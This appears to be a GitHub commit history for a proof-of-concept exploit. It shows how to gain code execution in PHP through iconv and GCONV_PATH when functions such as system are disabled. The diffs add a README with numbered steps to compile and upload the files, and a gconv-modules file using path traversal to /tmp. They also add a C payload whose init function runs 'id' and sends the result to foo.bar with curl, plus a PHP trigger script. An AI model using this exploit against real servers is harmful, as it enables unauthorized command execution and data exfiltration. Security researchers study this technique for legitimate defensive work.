LoadLow · August 14, 2023 13:55 · Nov 4, 2019 · Nov 4, 2019 · Nov 4, 2019 · Nov 4, 2019
diff --git a/Readme.md b/Readme.md
@@ -6,7 +6,7 @@ It uses `iconv`, in php, in order to execute the same payload.
 
 Uses cases :
 - You control the first parameter of `iconv` (in_charset), you can set an env var and you can upload arbitrary files (`.so` library file and the `gconv-modules` file) and you know their path.
-- You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled but you can `setenv` but `LD_PRELOAD` is blacklisted.
+- You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled but you can `setenv` (and `LD_PRELOAD` is blacklisted).
 
 In this example, the files `gconv-modules` and `payload.so` are stored in `/tmp`.
 

diff --git a/Readme.md b/Readme.md
@@ -6,7 +6,7 @@ It uses `iconv`, in php, in order to execute the same payload.
 
 Uses cases :
 - You control the first parameter of `iconv` (in_charset), you can set an env var and you can upload arbitrary files (`.so` library file and the `gconv-modules` file) and you know their path.
-- You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled. 
+- You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled but you can `setenv` but `LD_PRELOAD` is blacklisted.
 
 In this example, the files `gconv-modules` and `payload.so` are stored in `/tmp`.
 

diff --git a/Readme.md b/Readme.md
@@ -5,7 +5,7 @@ Credits: @hugeh0ge
 It uses `iconv`, in php, in order to execute the same payload. 
 
 Uses cases :
-- You control the first parameter of `iconv` (in_charset) and you can upload arbitrary files (`.so` library file and the `gconv-modules` file) and you know their path.
+- You control the first parameter of `iconv` (in_charset), you can set an env var and you can upload arbitrary files (`.so` library file and the `gconv-modules` file) and you know their path.
 - You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled. 
 
 In this example, the files `gconv-modules` and `payload.so` are stored in `/tmp`.

diff --git a/Readme.md b/Readme.md
@@ -10,12 +10,14 @@ Uses cases :
 
 In this example, the files `gconv-modules` and `payload.so` are stored in `/tmp`.
 
-Compile the payload library
+1. Compile the payload library.
 ```bash
 gcc payload.c -o payload.so -shared -fPIC
 ```
 
-Exec the php payload
+2. Upload / write the files `gconv-modules` and `payload.so` on the server.
+
+3. Trigger the php code stored on the server
 ```bash
 curl https://mysuperserver.com/poc.php
 ```
diff --git a/Readme.md b/Readme.md
@@ -4,7 +4,7 @@ Credits: @hugeh0ge
 
 It uses `iconv`, in php, in order to execute the same payload. 
 
-Use cases :
+Uses cases :
 - You control the first parameter of `iconv` (in_charset) and you can upload arbitrary files (`.so` library file and the `gconv-modules` file) and you know their path.
 - You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled. 
 

diff --git a/payload.c b/payload.c
@@ -5,6 +5,6 @@ void gconv() {}
 
 void gconv_init() {
   puts("pwned");
-  system("id=`id`;curl http://foo.bar --data=\"$id\"");
+  system("id=`id`;curl http://foo.bar --data \"$id\"");
   exit(0);
 }
diff --git a/Readme.md b/Readme.md
@@ -8,6 +8,8 @@ Use cases :
 - You control the first parameter of `iconv` (in_charset) and you can upload arbitrary files (`.so` library file and the `gconv-modules` file) and you know their path.
 - You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled. 
 
+In this example, the files `gconv-modules` and `payload.so` are stored in `/tmp`.
+
 Compile the payload library
 ```bash
 gcc payload.c -o payload.so -shared -fPIC

diff --git a/gconv-modules b/gconv-modules
@@ -1,2 +1,2 @@
-module  PAYLOAD//    INTERNAL    ../../../../../../../../var/www/html/payload    2
-module  INTERNAL    PAYLOAD//    ../../../../../../../../var/www/html/payload    2
+module  PAYLOAD//    INTERNAL    ../../../../../../../../tmp/payload    2
+module  INTERNAL    PAYLOAD//    ../../../../../../../../tmp/payload    2
diff --git a/poc.php b/poc.php
@@ -1,2 +1,2 @@
-putenv("GCONV_PATH=.");
+putenv("GCONV_PATH=/tmp");
 iconv("payload", "UTF-8", "whatever");
diff --git a/Readme.md b/Readme.md
@@ -8,9 +8,12 @@ Use cases :
 - You control the first parameter of `iconv` (in_charset) and you can upload arbitrary files (`.so` library file and the `gconv-modules` file) and you know their path.
 - You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled. 
 
+Compile the payload library
+```bash
 gcc payload.c -o payload.so -shared -fPIC
 ```
 
+Exec the php payload
 ```bash
 curl https://mysuperserver.com/poc.php
 ```
diff --git a/Readme.md b/Readme.md
@@ -1 +1,16 @@
-https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/This is based on 
+This is based on https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/
+
+Credits: @hugeh0ge
+
+It uses `iconv`, in php, in order to execute the same payload. 
+
+Use cases :
+- You control the first parameter of `iconv` (in_charset) and you can upload arbitrary files (`.so` library file and the `gconv-modules` file) and you know their path.
+- You have a php RCE but `system`, `shell_exec`, `curl_exec` and other functions are disabled. 
+
+gcc payload.c -o payload.so -shared -fPIC
+```
+
+```bash
+curl https://mysuperserver.com/poc.php
+```
diff --git a/gconv-modules b/gconv-modules
@@ -0,0 +1,2 @@
+module  PAYLOAD//    INTERNAL    ../../../../../../../../var/www/html/payload    2
+module  INTERNAL    PAYLOAD//    ../../../../../../../../var/www/html/payload    2
diff --git a/payload.c b/payload.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void gconv() {}
+
+void gconv_init() {
+  puts("pwned");
+  system("id=`id`;curl http://foo.bar --data=\"$id\"");
+  exit(0);
+}
diff --git a/poc.php b/poc.php
@@ -0,0 +1,2 @@
+putenv("GCONV_PATH=.");
+iconv("payload", "UTF-8", "whatever");
diff --git a/Readme.md b/Readme.md
@@ -0,0 +1 @@
+https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/This is based on
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1,2 @@
		module PAYLOAD// INTERNAL ../../../../../../../../var/www/html/payload 2
		module INTERNAL PAYLOAD// ../../../../../../../../var/www/html/payload 2
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1,2 @@
		putenv("GCONV_PATH=.");
		iconv("payload", "UTF-8", "whatever");
Original file line number	Diff line number	Diff line change
		@@ -0,0 +1 @@
		https://hugeh0ge.github.io/2019/11/04/Getting-Arbitrary-Code-Execution-from-fopen-s-2nd-Argument/This is based on